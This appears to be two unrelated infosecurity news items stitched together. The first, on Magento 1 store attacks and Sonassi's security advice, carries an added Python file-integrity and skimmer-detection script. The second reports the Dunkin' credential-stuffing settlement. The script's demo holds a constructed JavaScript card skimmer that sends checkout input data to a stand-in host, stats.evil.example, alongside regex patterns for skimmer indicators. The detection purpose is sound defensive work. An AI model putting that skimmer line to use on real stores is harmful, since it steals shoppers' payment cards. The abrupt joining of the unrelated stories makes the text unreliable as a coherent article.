Sansec’s Threat Research Team, which revealed the attacks, suggested that attackers may have found a new way to compromise the stores’ servers, potentially exploiting a zero-day in Magento 1 that was advertised online. It warned that if this is the case, the roughly 95,000 stores still running Magento 1 could also be exposed to the exploit.
James Allen-Lewis, development director at Sonassi, commented: “Unfortunately, this incident should not come as a surprise. As far back as last year, warnings had been issued about the likelihood of attacks on Magento 1 stores, and as the deadline to end-of-life grew closer, these warnings have gotten louder. While cyber-threats do exist on Magento 2, those remaining on Magento 1 are no longer supported with security patches, and therefore a prime target for hackers.”
Allen-Lewis added that due to the accelerated shift to e-commerce during the COVID-19 pandemic, it is more important than ever that retailers secure their digital shopping sites. The prospect of a second wave of the virus and localized lockdowns are likely to boost demand on this channel even further.
Allen-Lewis said: “It’s critical retailers deploy basic cybersecurity best practices. Simple things such as regular updates to your passwords and multi-factor authentication are often overlooked. Additionally, retailers should be locking down the administrator interface by IP address. This simple change makes it much harder for hackers to get near this critical part of the store.
“Many attacks involve files being added or changed on a website. It is vital you monitor your log for any suspicious file activity. Furthermore, run regular audits on admin accounts and keep admin access to a minimum. You should always know who has access to your website.
“Finally, ensure you scan your website regularly for indicators of compromise. This will give you a much stronger insight into the security posture of your business.”
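Two of the controls Allen-Lewis lists, monitoring for suspicious file changes and scanning for indicators of compromise, are easy to combine into a single check. The script below is an added example, not Sonassi’s, Sansec’s or Magento’s code: it records a SHA-256 baseline of the scripts and templates under a web root, diffs the current state against that baseline, and runs every added or changed file through a small set of heuristic indicators typical of client-side skimmers (sweeping all `input` fields, referencing Magento payment field names such as `cc_number`, beaconing via `new Image().src` or `sendBeacon`, `btoa`/`eval`, long base64 or hex-escaped strings). A file is only flagged when at least two distinct indicators co-occur, to keep noise down. The directory layout, the `evil.example` host and the sample JavaScript are constructed for the demo and are not real malware.

```python
# Added example (not Sonassi's, Sansec's or Magento's code): baseline hash snapshot
# of a web root plus a heuristic scan of added/changed files for skimmer indicators.
# File names, the evil.example host and the sample JS below are constructed.
import hashlib
import re
import tempfile
from pathlib import Path

WATCHED_SUFFIXES = {".js", ".phtml", ".php", ".html"}

# Heuristic indicators of a client-side skimmer. Each is weak on its own, so a
# file is only flagged when at least FLAG_THRESHOLD distinct indicators co-occur.
SKIMMER_INDICATORS = {
    "input_sweep": re.compile(r"querySelectorAll\(\s*['\"]input", re.I),
    "payment_fields": re.compile(r"cc_number|cc_cid|card_number|cvv|cvc", re.I),
    "exfil_beacon": re.compile(r"new\s+Image\(\)\.src\s*=|navigator\.sendBeacon\s*\("),
    "encode_or_eval": re.compile(r"\b(?:btoa|atob|eval|unescape)\s*\("),
    "long_base64": re.compile(r"['\"][A-Za-z0-9+/]{80,}={0,2}['\"]"),
    "hex_escapes": re.compile(r"(?:\\x[0-9a-fA-F]{2}){8,}"),
}
FLAG_THRESHOLD = 2


def snapshot(root):
    """Map each watched file (path relative to root) to the SHA-256 of its bytes."""
    root = Path(root)
    result = {}
    for path in root.rglob("*"):
        if path.is_file() and path.suffix.lower() in WATCHED_SUFFIXES:
            digest = hashlib.sha256(path.read_bytes()).hexdigest()
            result[path.relative_to(root).as_posix()] = digest
    return result


def diff_snapshots(baseline, current):
    """Return the files added, removed or changed since the baseline was taken."""
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "changed": sorted(p for p in set(baseline) & set(current) if baseline[p] != current[p]),
    }


def scan_text(text):
    """Return the sorted names of the skimmer indicators present in a file's contents."""
    return sorted(name for name, rx in SKIMMER_INDICATORS.items() if rx.search(text))


def triage(root, baseline):
    """Diff the web root against the baseline and scan every added or changed file.
    Files with FLAG_THRESHOLD or more indicators are reported under 'flagged'."""
    root = Path(root)
    current = snapshot(root)
    changes = diff_snapshots(baseline, current)
    flagged = {}
    for rel in changes["added"] + changes["changed"]:
        hits = scan_text((root / rel).read_text(errors="replace"))
        if len(hits) >= FLAG_THRESHOLD:
            flagged[rel] = hits
    return {**changes, "flagged": flagged, "snapshot": current}


# Constructed sample files for the demo; the "skimmer" is a caricature, not real malware.
CLEAN_JS = "document.getElementById('checkout').addEventListener('submit', validate);\n"
INJECTED_JS = CLEAN_JS + (
    "(function(){var f=document.querySelectorAll('input'),d={};"
    "for(var i=0;i<f.length;i++){d[f[i].name]=f[i].value;}"
    "if(d['payment[cc_number]']){new Image().src='https://stats.evil.example/c?d='"
    "+btoa(JSON.stringify(d));}})();\n"
)


def demo():
    """Baseline a clean store, modify the checkout script in place, and triage."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "skin" / "frontend").mkdir(parents=True)
        (root / "skin" / "frontend" / "checkout.js").write_text(CLEAN_JS)
        (root / "index.php").write_text("<?php echo 'store';\n")
        baseline = snapshot(root)
        # Simulated compromise: the existing checkout script gets the skimmer appended.
        (root / "skin" / "frontend" / "checkout.js").write_text(INJECTED_JS)
        report = triage(root, baseline)
        report.pop("snapshot")
        return report


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

In practice the baseline would be taken from a known-good deployment (or regenerated on every release), stored off the web server, and `triage()` run from cron so that a file changed by anything other than a deployment is reported. The indicator list is deliberately small; a hit on a changed file is a prompt to inspect it, not a verdict.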
The suit was filed against Dunkin' Brands Group Inc. in state Supreme Court in Manhattan in September last year by the state of New York's attorney general Letitia James.
James alleged that Dunkin' neglected to inform customers of cyber-attacks that took place between 2015 and 2018 that compromised the accounts of thousands of customers.
Attackers used automated credential stuffing and brute-force attacks to steal money from customer accounts created through Dunkin's free mobile app or website.
James alleged that Dunkin' failed to inform customers that attacks had taken place, despite being warned repeatedly about the issue by its app developer.
During the summer of 2015, Dunkin's app developer provided the company with a list of 19,715 accounts that had been compromised by attacks over a sample period of just five days, but the donut seller failed to tell customers or upgrade its security, according to the lawsuit.
When the lawsuit was filed, Dunkin's chief communications officer Karen Raskopf told Infosecurity Magazine that there was "no basis for these claims" and that the company looked forward "to proving our case in court."
However, on Tuesday, Dunkin' Brands Group Inc. agreed to $650,000 in fines and costs to settle the lawsuit, according to Reuters. The company further acquiesced to carrying out an upgrade of its security protocols.
Under the terms of the settlement, Dunkin' customers will be notified of the cyber-attacks that took place between 2015 and 2018 and will be advised to reset their passwords.
Dunkin' has further agreed to give refunds for unauthorized transactions that occurred on their Dunkin' brand stored-value cards.
Dunkin' has not confirmed or denied any wrongdoing in relation to the cyber-attacks. The settlement of the suit requires a judge's approval.
The company, which is based in Canton, Massachusetts, has around 8,000 branches nationally, including 1,000 Dunkin' locations in New York.
Announcing the settlement, James punned: "Not only will customers be reimbursed for lost funds, but we are ensuring the company’s dangerous brew of lax security and negligence comes to an end.”